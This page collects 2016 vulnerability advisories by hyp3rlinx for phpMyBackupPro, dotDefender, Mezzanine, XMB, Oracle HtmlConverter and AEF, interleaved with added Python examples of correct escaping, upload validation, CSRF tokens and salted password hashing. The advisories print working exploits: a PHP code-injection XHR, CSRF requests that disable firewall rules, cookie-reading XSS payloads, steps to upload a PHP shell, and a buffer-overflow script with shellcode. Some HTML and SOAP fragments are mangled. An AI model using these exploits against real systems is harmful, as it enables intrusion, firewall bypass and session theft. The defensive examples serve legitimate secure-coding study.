Send the admin an infected link or convince them to visit our malicious webpage, then if the user is logged in and...
a) clicks our link or visits our evil webpage or
b) submits the form locally (malicious user)
then BOOOM!

Exploit to run calc.exe on Windows

    var c=0;
    (function RCE_MAYHEM(){
        c++
        var xhr=new XMLHttpRequest()
        xhr.open('POST','http://localhost/phpMyBackupPro-2.5/phpMyBackupPro-2.5/config.php',true)
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhr.withCredentials = true;
        xhr.send("sitename=localhost&lang=''///\\');exec(`c:/\Windows/\system32/\calc.exe`); ///\';&sql_host=localhost&sql_user=&sql_passwd=&sql_db=&ftp_server=hyp3rlinx.altervista.org&ftp_user=hyp3rlinx&ftp_passwd=&ftp_path=&ftp_pasv=1&ftp_port=666&ftp_del=1&email_use=1&email=&submit=Save+data")
        if(c<2){
            RCE_MAYHEM()
        }
    })()

Disclosure Timeline:
Vendor Notification: NR
February 16, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
High

Description:
Request Method(s): [+] POST
Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP)
Vulnerable Parameter(s): [+] $CONF

by hyp3rlinx
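The saved lines above show the defect precisely: the quote in the submitted value was escaped, but the backslash in front of it was not, so PHP reads the doubled backslash as one literal backslash and the quote that follows closes the string. The added example below (Python, not phpMyBackupPro code and not its fix) reproduces that quote-only escaping, shows the correct escaping for a PHP single-quoted literal, and checks both with a small parser that follows PHP's single-quote rules. The payload is a constructed stand-in with the same shape as the advisory's (two quotes, slashes, a backslash before a quote) and a harmless INJECTED() marker in place of the command; the config keys are constructed too.

```python
"""Quote-only escaping lets input close a PHP string literal; a correct
serialiser escapes the backslash first.

Added example, not code from phpMyBackupPro. escape_quotes_only() is an
assumed reconstruction of the behaviour the advisory's output implies,
not the project's source.
"""
from typing import Callable, Dict, Tuple

# Constructed stand-in for the advisory's payload: same structure,
# harmless marker instead of a command. Actual value:  ''///\');INJECTED(); ///\';
PAYLOAD = "''///\\');INJECTED(); ///\\';"


def escape_quotes_only(value: str) -> str:
    """The flawed approach: escape the quote, leave the backslash alone."""
    return value.replace("'", "\\'")


def escape_for_single_quoted(value: str) -> str:
    """Correct inner escaping for a PHP single-quoted literal: double the
    backslashes before escaping quotes, so no input can yield a bare quote."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def php_single_quoted(value: str) -> str:
    return "'" + escape_for_single_quoted(value) + "'"


def parse_php_single_quoted(literal: str) -> Tuple[str, str]:
    """Decode a PHP single-quoted literal as the PHP lexer does: only
    backslash-backslash and backslash-quote are escapes; any other
    backslash is literal. Returns (value, text after the closing quote)."""
    if not literal.startswith("'"):
        raise ValueError("not a single-quoted literal")
    out = []
    i = 1
    while i < len(literal):
        c = literal[i]
        if c == "\\" and i + 1 < len(literal) and literal[i + 1] in "\\'":
            out.append(literal[i + 1])
            i += 2
        elif c == "'":
            return "".join(out), literal[i + 1:]
        else:
            out.append(c)
            i += 1
    raise ValueError("unterminated literal")


def breaks_out(value: str, escaper: Callable[[str], str]) -> bool:
    """True if, after escaping with `escaper`, anything remains after the
    literal's closing quote, i.e. the input ended the string early."""
    _, rest = parse_php_single_quoted("'" + escaper(value) + "'")
    return rest != ""


def render_global_conf(conf: Dict[str, str]) -> str:
    """Emit a global_conf.php-style file with every key and value quoted
    safely. Storing settings as data (JSON, ini) instead of PHP source is
    better still; this is the minimum if the file has to stay PHP."""
    lines = ["<?php"]
    for key, value in conf.items():
        lines.append(f"$CONF[{php_single_quoted(key)}] = {php_single_quoted(value)};")
    return "\n".join(lines) + "\n"
```

With the flawed escaper the parser stops at the first unescaped quote and reports the rest of the payload as trailing PHP code; with the correct escaper the literal round-trips to the original value and nothing follows it. A serialiser that already does this is var_export(); the point of writing it out is to see which character the original code forgot.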
phpMyBackupPro v.2.5 Arbitrary File Upload
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-FILE_UPLOAD_VULN.txt

Vendor:
www.phpmybackuppro.net
project site: sourceforge.net/projects/phpmybackup/

Product:
phpMyBackupPro v.2.5 (PMBP)

phpMyBackup Pro is a very easy to use, free, web-based MySQL backup application, licensed under the GNU GPL. You can create scheduled backups, manage and restore them, download or email them and a lot more.

Vulnerability Type:
Arbitrary File Upload

CVE Reference:
N/A

Vulnerability Details:
phpMyBackupPro allows SQL uploads but fails to check the actual file type, allowing arbitrary file uploads which can lead to arbitrary OS commands, backdoor shells etc...

Exploit code(s):
Arbitrary File Upload: under "database queries" the user has the option to 'Upload sql file':

1) upload a malicious PHP file as an SQL import, selecting "fragmented".
2) click 'Yes' when prompted 'Do you really want to import this backup?'
3) make an HTTP request to process the uploaded PHP file e.g. http://localhost/phpMyBackupPro-2.5/export/EVIL.php and BOOM!

The 'export' directory comes unprotected with no .htaccess file etc.. and, most important, the file upload type is not checked.

Disclosure Timeline:
Vendor Notification: NR
February 16, 2016 : Public Disclosure

Exploitation Technique:
Local

Severity Level:
High

Description:
Request Method(s): [+] POST
Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP)

by hyp3rlinx
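Three separate weaknesses combine in the upload flow described above: the file type is never checked, the client's file name is kept, and the destination directory is served and executes scripts. The added example below (Python, not phpMyBackupPro code) shows the controls that close each one for a ".sql" upload feature: an extension allow-list on the last extension, a content sniff for script open tags, a server-chosen file name, and a storage directory outside the document root. The storage path, size cap and marker list are constructed for the example.

```python
"""Upload validation that trusts neither the client's file name nor its
declared type. Added example, not code from phpMyBackupPro.
"""
import os
import secrets

# Constructed storage location: outside the web root, so nothing stored
# here is ever served or executed by the web server.
STORAGE_DIR = "/var/lib/pmbp-uploads"
ALLOWED_EXTENSIONS = {".sql"}
MAX_SIZE = 50 * 1024 * 1024  # 50 MiB, an arbitrary cap for the example

# Script open tags that have no business in a SQL dump (case-insensitive).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


class UploadRejected(ValueError):
    """Raised with the reason an upload was refused."""


def validate_sql_upload(client_name: str, content: bytes) -> str:
    """Return a server-chosen file name for an acceptable upload, or raise
    UploadRejected. The client's name influences nothing but the checks."""
    # 1. Only a plain base name is accepted: no separators, no '.'/'..'.
    base = os.path.basename(client_name.replace("\\", "/"))
    if base != client_name or base in ("", ".", ".."):
        raise UploadRejected("file name must be a plain base name")
    # 2. Allow-list on the last extension, so 'dump.sql.php' is refused.
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # 3. Size cap.
    if len(content) > MAX_SIZE:
        raise UploadRejected("file too large")
    # 4. Content must look like text and carry no script open tags.
    lowered = content.lower()
    if b"\0" in content or any(marker in lowered for marker in SCRIPT_MARKERS):
        raise UploadRejected("content does not look like a SQL dump")
    # 5. Never reuse the client's name: pick one the client cannot predict.
    return secrets.token_hex(16) + ".sql"


def store_upload(client_name: str, content: bytes) -> str:
    """Validate, then return the absolute path the file would be written to.
    Writing is left to the caller so the example stays offline."""
    return os.path.join(STORAGE_DIR, validate_sql_upload(client_name, content))


def is_accepted(client_name: str, content: bytes) -> bool:
    """Convenience predicate used by the checks below."""
    try:
        validate_sql_upload(client_name, content)
        return True
    except UploadRejected:
        return False
```

Even with every check in place, the directory the files land in should be one the web server cannot execute from; the checks reduce what gets in, the location removes the consequence if something still does.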
phpMyBackupPro v.2.5 XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPMYBACKUPPRO-v2.5-XSS.txt

Vendor:
www.phpmybackuppro.net
project site: sourceforge.net/projects/phpmybackup/

Product:
phpMyBackupPro v.2.5 (PMBP)

phpMyBackup Pro is a very easy to use, free, web-based MySQL backup application, licensed under the GNU GPL. You can create scheduled backups, manage and restore them, download or email them and a lot more.

Vulnerability Type:
XSS

CVE Reference:
N/A

Vulnerability Details:
phpMyBackupPro is vulnerable to multiple XSS entry points allowing arbitrary client side code execution within the victim's browser, undermining the trust between the client and server... if the user clicks an infected linx or visits a malicious webpage.

Exploit code(s):

XSS 1)
http://localhost/phpMyBackupPro-2.5/get_file.php?download=true=%3Cscript%3Ealert%28%27XSS%20hyp3rlinx%27%29%3C/script%3E

XSS 2)
http://localhost/phpMyBackupPro-2.5/db_info.php?table=alert('XSS hyp3rlinx')

XSS 3)
http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=phpdug=%3Cscript%3Ealert%28666%29%3C%2Fscript%3E=0=0=0=0=1

XSS 4)
http://localhost/phpMyBackupPro-2.5/big_import.php?dbn=alert(666)<%2Fscript>&fn=http%3A%2F%2Fhyp3rlinx.altervista.org%2Fhell.sql&start=0&foffset=0&totalqueries=0&sn=0&delete=1

XSS 5)
<form id="XSS" action="http://localhost/phpMyBackupPro-2.5/sql_query.php" method="post">
<input type="hidden" name="db" value="mysql" />
<input type="hidden" name="sql_query" value="<script>alert('XSS hyp3rlinx \n\n'+document.cookie)" />
document.getElementById('XSS').submit()

Disclosure Timeline:
Vendor Notification: NR
February 16, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
High

Description:
Request Method(s): [+] GET / POST
Vulnerable Product: [+] phpMyBackupPro v.2.5 (PMBP)

by hyp3rlinx
dotDefender Firewall CSRF
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/DOT-DEFENDER-CSRF.txt

Vendor:
www.applicure.com

Product:
dotDefender Firewall
Versions: 5.00.12865 / 5.13-13282

dotDefender is a Web application firewall (WAF) for preventing hacking attacks like XSS, SQL Injections, CSRF etc... that provides Apache and IIS Server Security across Dedicated, VPS and Cloud environments. It meets PCI Compliance and also provides E-Commerce Security, IIS and Apache Security, Cloud Security and more.

Vulnerability Type:
Cross Site Request Forgery - CSRF

CVE Reference:
N/A

Vulnerability Details:
The dotDefender firewall (WAF) is vulnerable to cross site request forgery. This allows attackers to make HTTP requests via the victim's browser to the dotDefender management server on behalf of the victim if the victim is logged in and visits a malicious web page or clicks an infected link. The result can be modifying or disabling various firewall patterns, User-Defined Rule settings and global event logging etc...

HTTP requests sent to dotDefender to enable or disable User-Defined rule settings are base64 encoded using the SOAP protocol. Sending the below base64 value, for example, disables a dotDefender firewall setting.

PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+   (decodes to <enabled>false</enabled>)

Tested successfully on Windows & Linux:

dotDefender Version: 5.00.12865
Web Server Type: Microsoft-IIS
Server Operating System: Windows
Web Server Version: 7.5
Firefox web browser

dotDefender Version: 5.13-13282
Web Server Type: Apache
Server Operating System: Linux

Exploit code(s):
Example to send requests to disable the firewall rule settings that defend against SQL injection. We need to send two requests: the first to modify the desired settings and the second to commit our changes.

HTTP request 0x01 - send the following SOAP request to disable the SQL Injection request firewall rule
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
http://localhost/dotDefender/dotDefenderWS.exe; ENCTYPE="text/plain" method="post" onsubmit="TORMENT()">
document.getElementById('SACRIFICIAL').submit()

HTTP request 0x02 - send the next request to commit the changes
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~
http://localhost/dotDefender/dotDefenderWS.exe; ENCTYPE="text/plain" method="post">
function TORMENT(){document.getElementById('VICTIM').submit()}

Other SOAP payload examples for rule disabling:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
This disables rule #19; send the below request to disable remote IP protections:

http://www.w3.org/2001/XMLSchema-instance; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:ZSI="http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/; xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/; soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>
http://applicure.com/dotDefender;>
0
/ud_rules/request_rules/request_rule[rule_id=19]/enabled
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+

disable rule 20:
~=~=~=~=~=~=~=~=
http://www.w3.org/2001/XMLSchema-instance; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:ZSI="http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/; xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/; soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>
http://applicure.com/dotDefender;>
0
/ud_rules/request_rules/request_rule[rule_id=20]/enabled
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+

Finally commit them with the below request:
~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
http://www.w3.org/2001/XMLSchema-instance; xmlns:xsd="http://www.w3.org/2001/XMLSchema; xmlns:ZSI="http://www.zolera.com/schemas/ZSI/; xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/; xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/; xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/; soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/;>
http://applicure.com/dotDefender;>
0

Disclosure Timeline:
Vendor Notifications:
initial report 11/16/2015
vendor response 11/20/2015
vendor delays for two months
1/19/2016 Vendor finally acknowledges vulnerability
inform vendor of a disclosure date
vendor no longer responds
Feb 8, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
High

Descr
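The CSRF advisories on this page (WPN-XM, Trend Micro Deep Discovery, Xoops, phpMyBackupPro and the dotDefender SOAP interface above) share one root cause: a state-changing request is accepted on the strength of the session cookie alone, and the browser attaches that cookie to cross-site form posts and credentialed XHR just as it does to the real admin UI. The added example below (Python; not code from any of those products or their fixes) is a minimal request handler that ties each session to a random token the attacker's page cannot read, requires it on every POST, compares it in constant time, and additionally refuses POSTs whose Origin header names another site. The endpoint, the protected setting and the request shapes are constructed for the example.

```python
"""Anti-CSRF token and origin check for a state-changing management
request. Added example; not code from WPN-XM, Trend Micro, Xoops,
phpMyBackupPro or dotDefender.
"""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Tuple

SITE_ORIGIN = "https://waf-admin.example.test"   # constructed origin of the admin UI


@dataclass
class Session:
    user: str
    # Per-session random token; rendered into the UI's forms / XHR headers.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    """Constructed request shape: just the parts the check needs."""
    method: str
    cookies: Dict[str, str] = field(default_factory=dict)
    headers: Dict[str, str] = field(default_factory=dict)
    form: Dict[str, str] = field(default_factory=dict)


SESSIONS: Dict[str, Session] = {}                 # session cookie value -> Session
SETTINGS = {"sql_injection_rule_enabled": True}   # constructed protected state


def login(user: str) -> Tuple[str, str]:
    """Create a session; returns (session cookie value, csrf token)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = Session(user=user)
    return sid, SESSIONS[sid].csrf_token


def csrf_ok(req: Request, session: Session) -> bool:
    # Origin/Referer check: a cross-site POST carries the other site's origin.
    # Absent headers fall through to the token check rather than passing.
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if origin and not origin.startswith(SITE_ORIGIN):
        return False
    # Token check: present (form field or header) and equal to the session's.
    supplied = req.form.get("csrf_token") or req.headers.get("X-CSRF-Token", "")
    return hmac.compare_digest(supplied.encode(), session.csrf_token.encode())


def handle_rule_update(req: Request) -> Tuple[int, str]:
    """POST handler for a constructed 'enable/disable rule' endpoint.
    Returns (HTTP status, message)."""
    if req.method != "POST":
        return 405, "method not allowed"
    session = SESSIONS.get(req.cookies.get("session", ""))
    if session is None:
        return 401, "login required"
    if not csrf_ok(req, session):
        return 403, "CSRF check failed"
    SETTINGS["sql_injection_rule_enabled"] = req.form.get("enabled") == "true"
    return 200, "rule updated"
```

For a SOAP or JSON endpoint the same token travels in a custom request header instead of a form field; a plain HTML form cannot set custom headers, and a credentialed cross-origin XHR that sets one triggers a CORS preflight that the server simply does not approve.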
Mezzanine CMS 4.1.0 XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MEZZANINE-CMS-XSS.txt

Vendor:
mezzanine.jupo.org

Product:
Mezzanine 4.1.0

Mezzanine is an open source CMS built using the Python based Django framework.

Vulnerability Type:
XSS

CVE Reference:
N/A

Vulnerability Details:
XSS entry points exist within the filebrowser_safe package. In many areas throughout filebrowser, querystring parameters are passed directly into templates to form URLs for links and forms, and these were not being escaped correctly, therefore allowing arbitrary JavaScript code to be injected. In order to exploit this, an attacker would need to trick an authenticated administrator into clicking a malicious link or viewing a malicious web page containing the XSS payload.

Resolution: Upgrade right away (pip install -U filebrowser_safe). If for some reason you're unable to upgrade seamlessly, here is the fix which you need to apply:
https://github.com/stephenmcd/filebrowser-safe/commit/14b30017d27ca6a952e1578ed8cecbb102979967

Exploit code(s):

XSS 1)
http://localhost:8000/admin/media-library/rename/?ot=desc=date=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

XSS 2)
http://localhost:8000/admin/media-library/rename/?ot=desc=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=

XSS 3)
http://localhost:8000/admin/media-library/rename/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E==

XSS 4)
http://localhost:8000/admin/media-library/browse/?ot=%22/%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=gallery=date

XSS 5)
http://localhost:8000/admin/media-library/upload/?ot=desc=gallery=%3C%2Fscript%3E%3Cscript%3Ealert%28666%29%3C%2Fscript%3E

XSS 6)
http://localhost:8000/admin/media-library/upload/?ot=%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS\n\nhyp3rlinx%27%29%3C%2Fscript%3E=gallery=date

XSS 7)
http://localhost:8000/admin/media-library/upload//static/filebrowser/uploadify/?=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

Disclosure Timeline:
Vendor Notification: January 26, 2016
February 2, 2016 : Public Disclosure

Exploitation Technique:
Remote

Severity Level:
High

Description:
Request Method(s): [+] GET
Vulnerable Product: [+] Mezzanine 4.1.0

by hyp3rlinx
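The Mezzanine advisory states the mechanism shared by the XSS findings on this page (WPN-XM, phpMyBackupPro, Mezzanine): querystring values are pasted into templates to build link hrefs, form actions and inline scripts. Payloads 1-4 begin with "/> to close the attribute, payloads 5-7 begin with </script> to close the script element. The added example below (Python, not filebrowser_safe code and not the linked fix) shows the construction that makes both inert: percent-encode values when building the URL, HTML-escape the URL for the attribute context, and JSON-encode with angle brackets escaped when placing data inside a script block. The two payload strings are the page's own, decoded; the paths and parameter names are constructed.

```python
"""Context-aware escaping for values that end up in URLs, HTML attributes
and inline scripts. Added example, not Mezzanine/filebrowser_safe code.
"""
import html
import json
from urllib.parse import urlencode

# The page's payloads, percent-decoded.
ATTR_PAYLOAD = '"/><script>alert(document.cookie)</script>'
SCRIPT_PAYLOAD = "</script><script>alert(666)</script>"


def naive_href(path: str, params: dict) -> str:
    """What the advisory describes: values pasted straight into the template."""
    query = "&".join(f"{k}={v}" for k, v in params.items())
    return f'<a href="{path}?{query}">sort</a>'


def safe_href(path: str, params: dict) -> str:
    """Percent-encode the query (so quote, '<' and '>' cannot appear), then
    escape the whole URL for the attribute it is placed in ('&' -> '&amp;')."""
    url = f"{path}?{urlencode(params)}"
    return f'<a href="{html.escape(url, quote=True)}">sort</a>'


def naive_script_var(name: str, value: str) -> str:
    """String concatenation into an inline script: a '</script>' inside the
    value ends the script element and the rest is parsed as HTML."""
    return f'<script>var {name} = "{value}";</script>'


def script_literal(value: str) -> str:
    """JSON-encode the value, then additionally escape '<', '>' and '&' as
    JavaScript \\uXXXX sequences. The HTML parser, which runs before the
    JavaScript parser, can then never see a closing tag inside the block,
    while the result is still a valid JavaScript string literal."""
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def safe_script_var(name: str, value: str) -> str:
    return f"<script>var {name} = {script_literal(value)};</script>"


def tag_count(rendered: str) -> int:
    """Number of '<' characters in the rendered HTML: a cheap way to see
    whether a payload added elements the template did not contain."""
    return rendered.count("<")
```

The template engine's autoescaping would have covered the attribute case had the values not been marked safe or built by string concatenation; the inline-script case needs the JSON step regardless, because HTML escaping does not apply inside a script element.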
XMB - eXtreme Message Board v1.9.11.13 Weak Crypto
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XMB-WEAK-CRYPTO.txt

Vendor:
xmbforum2.com

Product:
XMB - eXtreme Message Board v1.9.11.13

XMB forum software is open source and runs PHP scripts with a MySQL database backend.

Vulnerability Type:
Weak Crypto / Insecure Password Storage

Vulnerability Details:

1) Weak Crypto
XMB Forum uses the weak MD5 hashing algorithm and no salt; the unsalted password hashes are then stored in a browser cookie and also in the 'xmb_members' table of the XMB database. Using weak cryptographic one-way hash functions like MD5 without a salt for storing user passwords gives attackers that gain access to this data the ability to conduct password cracking attacks using pre-computed dictionaries, e.g. rainbow tables.

2) Insecure Storage
Storing user passwords in unsalted MD5 hash form leaves them vulnerable both online and offline. I noticed XMB has no session timeout/logout mechanism for when a user is inactive for a certain period of time and does not log out, leaving their MD5 unsalted passwords stored in cookies on disc. This further allows their passwords to be vulnerable to theft if their local machine is compromised. However, even if the user logs out and XMB cookies are cleared, the passwords are still in the MySQL database on the server, unsalted and MD5 hashed.

POC:
Example XMB cookie ... MD5 password of 'abc123' > 'e99a18c428cb38d5f260853678922e03'

"xmblva=1453182891; xmblvb=1453178920; xmbuser=admin; xmbpw=e99a18c428cb38d5f260853678922e03; xmblva=1453091894;

On disc ---> %APPDATA%\Roaming\Mozilla\Firefox\Profiles in the 'cookies.sqlite' database file used by Firefox.
e.g. localhostxmbpwe99a18c428cb38d5f260853678922e03localhost/XMB-1.9.11.13/files

In "member.php" on line 493 under the files/ dir of the XMB application we see hashing of the user password using the weak MD5 hashing function, then being stored in the MySQL database.

    $password = md5($password);
    if ($SETTINGS['regoptional'] == 'off') {
        $db->query("INSERT INTO ".X_PREFIX."members (username, password, regdate, postnum, email, etc

In 'member.php' line 599 we see it stored in the cookie --->

    put_cookie("xmbpw", $password, $currtime, $cookiepath, $cookiedomain);

Disclosure Date:
Vendor Notification: NA
January 23, 2016 : Public Disclosure

by hyp3rlinx
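The two snippets above are the whole problem: one unsalted md5() call feeds both the database row and the cookie, so a copy of either is enough for a table lookup, and the cookie never expires. The added example below (Python, not XMB code and not its fix) shows the replacement for each part: a salted, iterated hash (PBKDF2-HMAC-SHA256 from the standard library; a memory-hard function such as Argon2 or scrypt is preferable where available) verified in constant time, a demonstration of why a precomputed MD5 table stops working once a salt is present, and a session whose cookie carries only an opaque random id with an idle timeout. The idle timeout and the small precomputed dictionary are constructed for the example; the MD5 of 'abc123' is the value the advisory shows.

```python
"""Salted slow password hashing, and a session cookie that does not carry
the password. Added example, not code from XMB.
"""
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional

ITERATIONS = 100_000
SESSION_TTL_SECONDS = 30 * 60   # constructed idle timeout for the example


def weak_hash(password: str) -> str:
    """What the advisory describes: unsalted MD5, identical for every user
    with the same password and trivially reversible by table lookup."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return 'pbkdf2_sha256$iterations$salt$hash' with a fresh random salt."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in
    constant time so timing does not leak how many bytes matched."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(iterations))
        return hmac.compare_digest(digest.hex(), digest_hex)
    except (ValueError, TypeError):
        return False


# Constructed stand-in for a precomputed MD5 dictionary (rainbow table).
PRECOMPUTED_MD5 = {weak_hash(p): p for p in ("abc123", "password", "123456")}


def lookup_precomputed(stored_hash: str) -> Optional[str]:
    """Reverse a hash by table lookup; only unsalted hashes are found."""
    return PRECOMPUTED_MD5.get(stored_hash)


# Sessions: the cookie holds a random id, never the password or its hash.
SESSIONS: Dict[str, dict] = {}


def create_session(username: str, now: Optional[float] = None) -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": username, "last_seen": now if now is not None else time.time()}
    return sid


def session_user(sid: str, now: Optional[float] = None) -> Optional[str]:
    """Return the user of a live session and refresh its idle timer; drop
    sessions idle for longer than SESSION_TTL_SECONDS."""
    now = now if now is not None else time.time()
    sess = SESSIONS.get(sid)
    if sess is None:
        return None
    if now - sess["last_seen"] > SESSION_TTL_SECONDS:
        del SESSIONS[sid]
        return None
    sess["last_seen"] = now
    return sess["user"]
```

The stored string carries its own algorithm name, iteration count and salt, so the cost can be raised later and old records re-hashed on next login without a schema change.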
Oracle HtmlConverter.exe Buffer Overflow
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-HTMLCONVERTER-BUFFER-OVERFLOW.txt

Vendor:
www.oracle.com

Product:
Java Platform SE 6 U24 HtmlConverter.exe
Product Version: 6.0.240.50

The HTML Converter is part of the Java SE binaries shipped with the JDK and allows web page authors to explicitly target the browsers and platforms used in their environment when modifying their pages.

Vulnerability Type:
Buffer Overflow

CVE Reference:
N/A

Vulnerability Details:
When calling htmlConverter.exe with a specially crafted payload it will cause a buffer overflow, executing arbitrary attacker-supplied code. This was a small vulnerability included as part of the overall Oracle CPU released on January 19, 2016.

Reference: http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html

registers ...

EAX FFFE
ECX FFFE
EDX 0008E3C8
EBX 7EFDE000
ESP 0018FEB4
EBP 0018FF88
ESI 1DB1
EDI
EIP 52525252 < "" \x52

C 0   ES 002B 32bit 0()
P 0   CS 0023 32bit 0()
A 1   SS 002B 32bit 0()
Z 0   DS 002B 32bit 0()
S 0   FS 0053 32bit 7EFDD000(FFF)
T 0   GS 002B 32bit 0()
D 0

Exploit code(s):

    ###pgm="C:\\Oracle\\Middleware\\jdk160_24\\bin\\HtmlConverter.exe "#EIP @ 2493
    pgm="C:\\Program Files (x86)\\Java\jdk160_24\\bin\\HtmlConverter.exe "
    #EIP 2469 - 2479

    #shellcode to pop calc.exe Windows 7 SP1
    sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
        "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
        "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
        "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
        "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
        "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
        "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

    #JMP ESP kernel32.dll
    rp=struct.pack('<L', 0x76E72E2B)
    payload="A"*2469+rp+"\x90"*10+sc
    subprocess.Popen([pgm, payload], shell=False)

Disclosure Timeline:
Vendor Notification: August 28, 2015
January 20, 2016 : Public Disclosure

Exploitation Technique:
Local

Severity Level:
Medium

Description:
Vulnerable Product: [+] Java SE 6 U24 HtmlConverter.exe

by hyp3rlinx
Advanced Electron Forum v1.0.9 Persistent XSS
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-XSS.txt

Vendor:
===
www.anelectron.com/downloads/

Product:
===
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched in current version.

Vulnerability Type:
===
Persistent XSS

CVE Reference:
===
N/A

Vulnerability Details:
===
In the Admin panel under Edit Boards / General Stuff / General Options there is an option to specify a redirect URL for the forum. See --> Redirect Forum: "Enter a URL to which this forum will be redirected to."

The redirect input field is vulnerable to a persistent XSS: the payload is stored in the MySQL database and attacker-supplied client-side code executes each time a victim visits the following URLs.

http://localhost/AEF(1.0.9)_Install/index.php?
http://localhost/AEF(1.0.9)_Install/index.php?act=admin=forums=editforum=1

Exploit code(s):
===
Persistent XSS

http://localhost/AEF(1.0.9)_Install/index.php?act=admin=forums=editforum=1" method="post">
document.getElementById('XSS-DE-PERSISTO').submit()

Some other misc XSS(s) under the 'Signature' area.

http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=signature
on Anchor link setting:
http://"onMouseMove="alert(0)

AND

http://localhost/AEF(1.0.9)_Install/index.php?act=usercp=writepm
email link:
mailto:"onMouseMove="alert(1)

Disclosure Timeline:
===
Vendor Notification: NA
January 17, 2016 : Public Disclosure

Exploitation Technique:
===
Remote

Severity Level:
===
High

Description:
===
Request Method(s): [+] POST
Vulnerable Product: [+] AEF v1.0.9 (exploit patched version)
